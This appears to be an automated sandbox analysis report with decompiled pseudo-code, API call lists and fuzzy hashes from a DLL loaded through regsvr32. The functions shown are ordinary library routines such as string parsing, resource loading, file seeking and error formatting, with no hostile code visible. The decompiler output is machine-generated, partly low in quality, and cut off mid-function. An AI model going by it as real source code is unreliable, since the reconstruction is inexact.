                                                                                                                					_t19 =  *_t36;
                                                                                                                					if(_t19 == 0x2b || _t19 == 0x2d) {
                                                                                                                						_t36 = CharNextA(_t36);
                                                                                                                					}
                                                                                                                					_t22 = E1003F111( *_t36 & 0x000000ff);
                                                                                                                					_pop(_t35);
                                                                                                                					_pop(_t26);
                                                                                                                					if(_t34 != 0) {
                                                                                                                						 *_t34 = _t22;
                                                                                                                					}
                                                                                                                					if(_t22 == 0) {
                                                                                                                						L3:
                                                                                                                						_t23 = 0;
                                                                                                                						goto L17;
                                                                                                                					} else {
                                                                                                                						_push(0xa);
                                                                                                                						_push(0);
                                                                                                                						_push( &_v264);
                                                                                                                						if(_a12 == 0) {
                                                                                                                							_t23 = E1003F022();
                                                                                                                						} else {
                                                                                                                							_t23 = E1003EFF9();
                                                                                                                						}
                                                                                                                						L17:
                                                                                                                						return E1003B437(_t23, _t26, _v8 ^ _t37, _t33, _t34, _t35);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if(_t34 != 0) {
                                                                                                                					 *_t34 =  *_t34 & _t14;
                                                                                                                				}
                                                                                                                				goto L3;
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                • CharNextA.USER32(?), ref: 1001DD12
                                                                                                                  • Part of subcall function 1003C669: __ismbcspace_l.LIBCMT ref: 1003C66F
                                                                                                                • CharNextA.USER32(00000000), ref: 1001DD2F
                                                                                                                • _strtol.LIBCMT ref: 1001DD5A
                                                                                                                • _strtoul.LIBCMT ref: 1001DD61
                                                                                                                  • Part of subcall function 1003F022: strtoxl.LIBCMT ref: 1003F042
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                • String ID:
                                                                                                                • API String ID: 4211061542-0
                                                                                                                • Opcode ID: 25463e5b0bf133586b7cdf245735b04a5a213f7af39cc14f1cd53aa4100b8590
                                                                                                                • Instruction ID: 63093995eb286e337a1dc0123a3d735157bfa6acab36133d4a00bfca87353496
                                                                                                                • Opcode Fuzzy Hash: 25463e5b0bf133586b7cdf245735b04a5a213f7af39cc14f1cd53aa4100b8590
                                                                                                                • Instruction Fuzzy Hash: 07212476600255AFCB21FB759C41BAAB7E8DF18341F110067EA80DF181DB70EE80CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E10032229(signed int _a4, signed int _a8, intOrPtr _a12) {
                                                                                                                				void* _t15;
                                                                                                                				signed int _t17;
                                                                                                                				void* _t18;
                                                                                                                				void* _t19;
                                                                                                                				signed int _t23;
                                                                                                                				signed int* _t31;
                                                                                                                
                                                                                                                				_t31 = _a8;
                                                                                                                				if(_t31 == 0) {
                                                                                                                					return _t15;
                                                                                                                				}
                                                                                                                				_t23 = _a4;
                                                                                                                				if((_t23 & 0x00002000) == 0) {
                                                                                                                					_t17 = (_t23 & 0x0000ffff) - 8;
                                                                                                                					if(_t17 == 0) {
                                                                                                                						__imp__#6( *_t31);
                                                                                                                						L16:
                                                                                                                						 *_t31 =  *_t31 & 0x00000000;
                                                                                                                						L17:
                                                                                                                						if((_t23 & 0x00001000) != 0 &&  !(_t23 & 0x00004000) != 0) {
                                                                                                                							__imp__CoTaskMemFree(_t31[1]);
                                                                                                                						}
                                                                                                                						return _t17;
                                                                                                                					}
                                                                                                                					_t18 = _t17 - 1;
                                                                                                                					if(_t18 == 0) {
                                                                                                                						L13:
                                                                                                                						_t17 =  *_t31;
                                                                                                                						if(_t17 == 0) {
                                                                                                                							goto L17;
                                                                                                                						}
                                                                                                                						_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
                                                                                                                						goto L16;
                                                                                                                					}
                                                                                                                					_t17 = _t18 - 3;
                                                                                                                					if(_t17 == 0) {
                                                                                                                						__imp__#9(_t31);
                                                                                                                						goto L17;
                                                                                                                					}
                                                                                                                					_t19 = _t17 - 1;
                                                                                                                					if(_t19 == 0) {
                                                                                                                						goto L13;
                                                                                                                					} else {
                                                                                                                						_t17 = _t19 - 0x7b;
                                                                                                                						if(_t17 == 0) {
                                                                                                                							E100321C6( &_a8, _a12);
                                                                                                                							_t17 = _a8;
                                                                                                                							if(_t17 != 0) {
                                                                                                                								 *((intOrPtr*)( *_t17 + 0x10))(_t17,  *_t31, 0);
                                                                                                                								_t17 = _a8;
                                                                                                                								if(_t17 != 0) {
                                                                                                                									_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L17;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t17 =  *_t31;
                                                                                                                				if(_t17 == 0) {
                                                                                                                					goto L17;
                                                                                                                				} else {
                                                                                                                					__imp__#16(_t17);
                                                                                                                					goto L16;
                                                                                                                				}
                                                                                                                			}










                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArrayDestroyFreeSafeTask
                                                                                                                • String ID:
                                                                                                                • API String ID: 3253174383-0
                                                                                                                • Opcode ID: 1b0f3043e45d70972d82d0e22df10beabba36c5207b92ffbc69bea4338304dcf
                                                                                                                • Instruction ID: 7c6a25e81efe522572f188cc284e61a9823761e9066aeb58094c9b0e6ac1569a
                                                                                                                • Opcode Fuzzy Hash: 1b0f3043e45d70972d82d0e22df10beabba36c5207b92ffbc69bea4338304dcf
                                                                                                                • Instruction Fuzzy Hash: AF112631600616BFDB5ACFA5DC88BAB77E8FF14292F114418F8559F694CB35E940CA60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 64%
                                                                                                                			E10030DE8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				int _t44;
                                                                                                                				signed int _t46;
                                                                                                                				signed int _t55;
                                                                                                                				void* _t60;
                                                                                                                				intOrPtr* _t62;
                                                                                                                				signed int _t63;
                                                                                                                				void* _t64;
                                                                                                                				void* _t65;
                                                                                                                
                                                                                                                				_t65 = __eflags;
                                                                                                                				_push(0x30);
                                                                                                                				E1003D1E6(E100545DD, __ebx, __edi, __esi);
                                                                                                                				_t55 = 0;
                                                                                                                				 *((intOrPtr*)(_t64 - 0x18)) = 0;
                                                                                                                				 *((intOrPtr*)(_t64 - 0x1c)) = 0x1005bb60;
                                                                                                                				_t62 =  *((intOrPtr*)(_t64 + 8));
                                                                                                                				_t56 = _t64 - 0x14;
                                                                                                                				 *(_t64 - 4) = 0;
                                                                                                                				E100231D3(_t64 - 0x14, _t65,  *((intOrPtr*)(_t62 - 0xb0)));
                                                                                                                				 *(_t64 - 4) = 1;
                                                                                                                				if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
                                                                                                                					_push( *((intOrPtr*)(_t64 + 0xc)));
                                                                                                                					_t60 = E100247E7(0, _t56, __edi, _t62, __eflags);
                                                                                                                					GetRgnBox( *(_t60 + 4), _t64 - 0x2c);
                                                                                                                					IntersectRect(_t64 - 0x3c, _t64 - 0x2c, _t62 - 0x9c);
                                                                                                                					_t44 = EqualRect(_t64 - 0x3c, _t64 - 0x2c);
                                                                                                                					__eflags = _t44;
                                                                                                                					_push( *((intOrPtr*)(_t64 + 0x10)));
                                                                                                                					if(_t44 == 0) {
                                                                                                                						L2:
                                                                                                                						_t46 =  *((intOrPtr*)( *_t62 + 0x64))(_t62, _t55);
                                                                                                                						 *(_t64 - 4) = _t55;
                                                                                                                						_t63 = _t46;
                                                                                                                						if( *(_t64 - 0x10) != _t55) {
                                                                                                                							_push( *((intOrPtr*)(_t64 - 0x14)));
                                                                                                                							_push(_t55);
                                                                                                                							E10022A6E();
                                                                                                                						}
                                                                                                                						_t55 = _t63;
                                                                                                                						L5:
                                                                                                                						 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
                                                                                                                						 *((intOrPtr*)(_t64 - 0x1c)) = 0x100572c4;
                                                                                                                						E10024848(_t64 - 0x1c);
                                                                                                                						return E1003D2BE(_t55);
                                                                                                                					}
                                                                                                                					_push(_t60);
                                                                                                                					E1002FA2A( *((intOrPtr*)( *((intOrPtr*)(_t62 - 0xac)) + 0x20)));
                                                                                                                					__eflags =  *(_t64 - 0x10);
                                                                                                                					 *(_t64 - 4) = 0;
                                                                                                                					if( *(_t64 - 0x10) != 0) {
                                                                                                                						_push( *((intOrPtr*)(_t64 - 0x14)));
                                                                                                                						_push(0);
                                                                                                                						E10022A6E();
                                                                                                                					}
                                                                                                                					goto L5;
                                                                                                                				}
                                                                                                                				_push( *((intOrPtr*)(_t64 + 0x10)));
                                                                                                                				goto L2;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$EqualH_prolog3Intersect
                                                                                                                • String ID:
                                                                                                                • API String ID: 2161412305-0
                                                                                                                • Opcode ID: 853f563e9cda0a2e46cf4fa50cc0200a65220ce54ebce3e63f591d04cd49029a
                                                                                                                • Instruction ID: 0e80549b52fdf9fcae58d9139d4dc047d7ed36b4e4bc231020cefd4c007a9893
                                                                                                                • Opcode Fuzzy Hash: 853f563e9cda0a2e46cf4fa50cc0200a65220ce54ebce3e63f591d04cd49029a
                                                                                                                • Instruction Fuzzy Hash: EA211975E0024AEFDB02DFA4D8809EFBBB8FF08201F41856AF515A7151DB74AA05DF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E1002BF42(void* __ecx, void* __edx, CHAR* _a4, intOrPtr _a8) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t23;
                                                                                                                				void* _t25;
                                                                                                                				CHAR* _t26;
                                                                                                                				void* _t32;
                                                                                                                				void* _t35;
                                                                                                                				struct HRSRC__* _t36;
                                                                                                                				void* _t37;
                                                                                                                				CHAR* _t38;
                                                                                                                				CHAR* _t39;
                                                                                                                				void* _t40;
                                                                                                                
                                                                                                                				_t35 = __edx;
                                                                                                                				_t33 = __ecx;
                                                                                                                				_t39 = _a4;
                                                                                                                				_t41 =  *(_t39 + 4) & 0x00000001;
                                                                                                                				_t32 = __ecx;
                                                                                                                				if(( *(_t39 + 4) & 0x00000001) == 0) {
                                                                                                                					_t36 = FindResourceA( *(_t39 + 8),  *(_t39 + 0xc), 5);
                                                                                                                					__eflags = _t36;
                                                                                                                					if(_t36 == 0) {
                                                                                                                						E10023F14(_t33);
                                                                                                                					}
                                                                                                                					_t37 = LoadResource( *(_t39 + 8), _t36);
                                                                                                                					__eflags = _t37;
                                                                                                                					if(_t37 == 0) {
                                                                                                                						E10023F14(_t33);
                                                                                                                					}
                                                                                                                					_t38 = LockResource(_t37);
                                                                                                                					__eflags = _t38;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						E10023F14(_t33);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t38 =  *(_t39 + 0xc);
                                                                                                                				}
                                                                                                                				_t23 = E10023187(_t32, _t38, _t39, _t41);
                                                                                                                				_t42 =  *((intOrPtr*)(_t23 + 0x3c));
                                                                                                                				if( *((intOrPtr*)(_t23 + 0x3c)) != 0) {
                                                                                                                					_t38 = E1002AE94(_t32, _t32, _t38, _t40, _t38);
                                                                                                                				}
                                                                                                                				_push(_a8);
                                                                                                                				_push(_t38);
                                                                                                                				_a4 = E1002BE5C(_t32, _t35, _t38, _t39, _t42);
                                                                                                                				_t25 =  *(_t32 + 0x5c);
                                                                                                                				if(_t25 != 0) {
                                                                                                                					GlobalFree(_t25);
                                                                                                                					 *(_t32 + 0x5c) =  *(_t32 + 0x5c) & 0x00000000;
                                                                                                                				}
                                                                                                                				_t26 = _a4;
                                                                                                                				if(_t26 != 0) {
                                                                                                                					_t38 = _t26;
                                                                                                                					 *(_t32 + 0x5c) = _t26;
                                                                                                                				}
                                                                                                                				 *(_t39 + 4) =  *(_t39 + 4) | 0x00000001;
                                                                                                                				 *(_t39 + 0xc) = _t38;
                                                                                                                				return _t26;
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32 ref: 1002BF60
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 1002BF75
                                                                                                                • LockResource.KERNEL32(00000000), ref: 1002BF87
                                                                                                                • GlobalFree.KERNEL32(?), ref: 1002BFC1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeGlobalLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3898064442-0
                                                                                                                • Opcode ID: c292e8a3e361ccacb43d5460c7091ec530d51ba018098cfedfd3db96603df792
                                                                                                                • Instruction ID: 776a8ecff99ac8d10405ddbbc1f7a8f433c5d66df8e6285090a91246efa81e06
                                                                                                                • Opcode Fuzzy Hash: c292e8a3e361ccacb43d5460c7091ec530d51ba018098cfedfd3db96603df792
                                                                                                                • Instruction Fuzzy Hash: 8C11C139200B01AFDB91DF65ED84B1ABBF5EF847A0B828439F84987211DB30E841CF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 57%
                                                                                                                			E100041C0(intOrPtr __ecx, void* __eflags) {
                                                                                                                				signed int _v4;
                                                                                                                				signed int _v8;
                                                                                                                				char _v264;
                                                                                                                				char _v528;
                                                                                                                				char _v532;
                                                                                                                				char _v536;
                                                                                                                				intOrPtr _v540;
                                                                                                                				intOrPtr _v544;
                                                                                                                				char* _v548;
                                                                                                                				char _v552;
                                                                                                                				void* _v556;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t19;
                                                                                                                				signed int _t23;
                                                                                                                				void* _t37;
                                                                                                                				intOrPtr _t38;
                                                                                                                				intOrPtr _t39;
                                                                                                                				signed int _t40;
                                                                                                                				signed int _t41;
                                                                                                                
                                                                                                                				_t40 =  &_v556;
                                                                                                                				_t19 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_v4 = _t19 ^ _t40;
                                                                                                                				_t39 = __ecx;
                                                                                                                				E1003BB70(_t37,  &_v264, 0, 0x104);
                                                                                                                				_t41 = _t40 + 0xc;
                                                                                                                				if(_t39 != 0) {
                                                                                                                					_v556 =  *((intOrPtr*)(_t39 + 0x20));
                                                                                                                				} else {
                                                                                                                					_v556 = 0;
                                                                                                                				}
                                                                                                                				_t23 =  &_v556;
                                                                                                                				_t36 =  &_v264;
                                                                                                                				_v552 = 0;
                                                                                                                				_v548 =  &_v264;
                                                                                                                				_v544 = 0x100571d0;
                                                                                                                				_v540 = 0x10;
                                                                                                                				_v536 = 0;
                                                                                                                				_v532 = 0;
                                                                                                                				_v528 = 0;
                                                                                                                				__imp__SHBrowseForFolderA(_t23);
                                                                                                                				_t38 = _t23;
                                                                                                                				if(_t38 != 0) {
                                                                                                                					E1003BB70(_t38,  &_v528, 0, 0x104);
                                                                                                                					_t41 = _t41 + 0xc;
                                                                                                                					_t36 =  &_v528;
                                                                                                                					__imp__SHGetPathFromIDListA(_t38,  &_v528);
                                                                                                                					_t23 = E1001D2C4(E1001D1C2(_t39, 0x425),  &_v536);
                                                                                                                				}
                                                                                                                				return E1003B437(_t23, 0, _v8 ^ _t41, _t36, _t38, _t39);
                                                                                                                			}

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$BrowseFolderFromListPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1504547611-0
                                                                                                                • Opcode ID: 6819a6900a6fc75afef4c1d62aa0338534924455249b355e309a386428dcb8fb
                                                                                                                • Instruction ID: e9938d9545fb07109ead17aea578d7edb6f9481b65e8534042f1f63524efbaa1
                                                                                                                • Opcode Fuzzy Hash: 6819a6900a6fc75afef4c1d62aa0338534924455249b355e309a386428dcb8fb
                                                                                                                • Instruction Fuzzy Hash: 2E115CB1604344AFD320EF64D8859AFB7E4FBC8304F40492EF59987241DB749A088B96
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 48%
                                                                                                                			E10022594(void* __ebx, intOrPtr __ecx, void* __eflags) {
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* _t10;
                                                                                                                				void* _t12;
                                                                                                                				intOrPtr* _t14;
                                                                                                                				intOrPtr* _t16;
                                                                                                                				intOrPtr* _t17;
                                                                                                                				intOrPtr* _t19;
                                                                                                                				void* _t20;
                                                                                                                				void* _t21;
                                                                                                                				void* _t26;
                                                                                                                				void* _t27;
                                                                                                                				void* _t28;
                                                                                                                				intOrPtr _t29;
                                                                                                                				void* _t30;
                                                                                                                
                                                                                                                				_t20 = __ebx;
                                                                                                                				_t29 = __ecx;
                                                                                                                				_push( *((intOrPtr*)(__ecx + 0x10)));
                                                                                                                				_t28 = E1004068A(__ebx, _t26, _t27, __ecx, __eflags);
                                                                                                                				_t32 = _t28 - 0xffffffff;
                                                                                                                				if(_t28 == 0xffffffff) {
                                                                                                                					_t29 =  *((intOrPtr*)(_t29 + 0xc));
                                                                                                                					_t19 = E1003D491(_t32);
                                                                                                                					_push(_t29);
                                                                                                                					_push( *_t19);
                                                                                                                					_push(6);
                                                                                                                					L2:
                                                                                                                					E10034C7E(_t20, _t26, _t28, _t29, _t32);
                                                                                                                				}
                                                                                                                				_push(2);
                                                                                                                				_push(0);
                                                                                                                				_push( *((intOrPtr*)(_t29 + 0x10)));
                                                                                                                				_t10 = E1004077F(_t20, _t26, _t28, _t29, _t32);
                                                                                                                				_t30 = _t30 + 0xc;
                                                                                                                				_t32 = _t10;
                                                                                                                				if(_t10 != 0) {
                                                                                                                					_t29 =  *((intOrPtr*)(_t29 + 0xc));
                                                                                                                					_t17 = E1003D491(_t32);
                                                                                                                					_push(_t29);
                                                                                                                					_push( *_t17);
                                                                                                                					_push(9);
                                                                                                                					goto L2;
                                                                                                                				}
                                                                                                                				_push(_t20);
                                                                                                                				_push( *((intOrPtr*)(_t29 + 0x10)));
                                                                                                                				_t21 = E1004068A(_t20, _t26, _t28, _t29, __eflags);
                                                                                                                				__eflags = _t21 - 0xffffffff;
                                                                                                                				if(__eflags == 0) {
                                                                                                                					_t29 =  *((intOrPtr*)(_t29 + 0xc));
                                                                                                                					_t16 = E1003D491(__eflags);
                                                                                                                					_push(_t29);
                                                                                                                					_push( *_t16);
                                                                                                                					_push(6);
                                                                                                                					L7:
                                                                                                                					E10034C7E(_t21, _t26, _t28, _t29, __eflags);
                                                                                                                				}
                                                                                                                				_push(0);
                                                                                                                				_push(_t28);
                                                                                                                				_push( *((intOrPtr*)(_t29 + 0x10)));
                                                                                                                				_t12 = E1004077F(_t21, _t26, _t28, _t29, __eflags);
                                                                                                                				_t30 = _t30 + 0xc;
                                                                                                                				__eflags = _t12;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_t29 =  *((intOrPtr*)(_t29 + 0xc));
                                                                                                                					_t14 = E1003D491(__eflags);
                                                                                                                					_push(_t29);
                                                                                                                					_push( *_t14);
                                                                                                                					_push(9);
                                                                                                                					goto L7;
                                                                                                                				}
                                                                                                                				asm("cdq");
                                                                                                                				return _t21;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _fseek_ftell$__getptd_noexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 447802652-0
                                                                                                                • Opcode ID: 11785c1dea90d14335aefef9d0ae8d99f4c363fef8522e8b316b858a84fe4fdf
                                                                                                                • Instruction ID: 43065fcdbdf70210dfcdbe1e975eca8b7f4038d670352e8965e8763de0eff24b
                                                                                                                • Opcode Fuzzy Hash: 11785c1dea90d14335aefef9d0ae8d99f4c363fef8522e8b316b858a84fe4fdf
                                                                                                                • Instruction Fuzzy Hash: 5701C4366017207FDA21AB71AD66F073B65EF41370F228635F855AF1E1DB31BC109A50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 87%
                                                                                                                			E10017077(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
                                                                                                                				intOrPtr* _v0;
                                                                                                                				void* _v4;
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr _v16;
                                                                                                                				void* _t20;
                                                                                                                				intOrPtr* _t23;
                                                                                                                				void* _t29;
                                                                                                                				void* _t31;
                                                                                                                				intOrPtr _t35;
                                                                                                                				char _t36;
                                                                                                                				void* _t40;
                                                                                                                				void* _t42;
                                                                                                                				void* _t44;
                                                                                                                
                                                                                                                				_t44 = __eflags;
                                                                                                                				_t38 = __esi;
                                                                                                                				_t37 = __edi;
                                                                                                                				_t31 = __ebx;
                                                                                                                				_push(4);
                                                                                                                				E1003D1E6(E10052A46, __ebx, __edi, __esi);
                                                                                                                				_t35 = E100160BC(_t44, 0xc);
                                                                                                                				_v16 = _t35;
                                                                                                                				_t20 = 0;
                                                                                                                				_v4 = 0;
                                                                                                                				if(_t35 != 0) {
                                                                                                                					_t20 = E10017061(_t35);
                                                                                                                				}
                                                                                                                				_t36 = _a4;
                                                                                                                				_v8 = _v8 | 0xffffffff;
                                                                                                                				 *((intOrPtr*)(_t20 + 8)) = _t36;
                                                                                                                				_a4 = _t20;
                                                                                                                				E1003D2F0( &_a4, 0x100650f0);
                                                                                                                				asm("int3");
                                                                                                                				_t40 = _t42;
                                                                                                                				_t23 = _v0;
                                                                                                                				_push(_t31);
                                                                                                                				if(_t23 != 0) {
                                                                                                                					 *_t23 = 0;
                                                                                                                				}
                                                                                                                				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
                                                                                                                					E10017042(0, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
                                                                                                                					LocalFree(_a12);
                                                                                                                					_t29 = 1;
                                                                                                                					__eflags = 1;
                                                                                                                				} else {
                                                                                                                					 *_a4 = 0;
                                                                                                                					_t29 = 0;
                                                                                                                				}
                                                                                                                				return _t29;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1001707E
                                                                                                                  • Part of subcall function 100160BC: _malloc.LIBCMT ref: 100160D6
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 100170B4
                                                                                                                • FormatMessageA.KERNEL32(00001100,00000000,?,00000800,DF7C0CDA,00000000,00000000,00000000,?,?,100650F0,00000004,10001016,?,1000172B,80070057), ref: 100170DD
                                                                                                                  • Part of subcall function 10017042: _wctomb_s.LIBCMT ref: 10017052
                                                                                                                • LocalFree.KERNEL32(DF7C0CDA,DF7C0CDA), ref: 10017106
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 1615547351-0
                                                                                                                • Opcode ID: 96699d556d2815da47b2b43aeee886ad479d9bc07f5f1e4164edeb2e1857a193
                                                                                                                • Instruction ID: c2498399052ac8db9aa405ae75ae692c91175d9d49365733ee352398681c6ca3
                                                                                                                • Opcode Fuzzy Hash: 96699d556d2815da47b2b43aeee886ad479d9bc07f5f1e4164edeb2e1857a193
                                                                                                                • Instruction Fuzzy Hash: A5113075604249FFDB02DFA4DC81AAE7BB9FB08350F108529FA19CE2A1D671D990CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E10021078(void* __ecx) {
                                                                                                                				void* _v8;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t23;
                                                                                                                				void* _t28;
                                                                                                                				void* _t30;
                                                                                                                				struct HINSTANCE__* _t32;
                                                                                                                				signed int _t34;
                                                                                                                				signed short _t35;
                                                                                                                				void* _t37;
                                                                                                                				signed short* _t40;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_push(_t28);
                                                                                                                				_t37 = __ecx;
                                                                                                                				_t42 =  *((intOrPtr*)(__ecx + 0x58));
                                                                                                                				_t40 =  *(__ecx + 0x60);
                                                                                                                				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
                                                                                                                					_t32 =  *(E10023187(_t28, __ecx, _t40, _t42) + 0xc);
                                                                                                                					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
                                                                                                                				}
                                                                                                                				if(_v8 != 0) {
                                                                                                                					_t40 = LockResource(_v8);
                                                                                                                				}
                                                                                                                				_t30 = 1;
                                                                                                                				if(_t40 != 0) {
                                                                                                                					_t35 =  *_t40;
                                                                                                                					if(_t40[1] != 0xffff) {
                                                                                                                						_t23 = _t40[5] & 0x0000ffff;
                                                                                                                						_t34 = _t40[6] & 0x0000ffff;
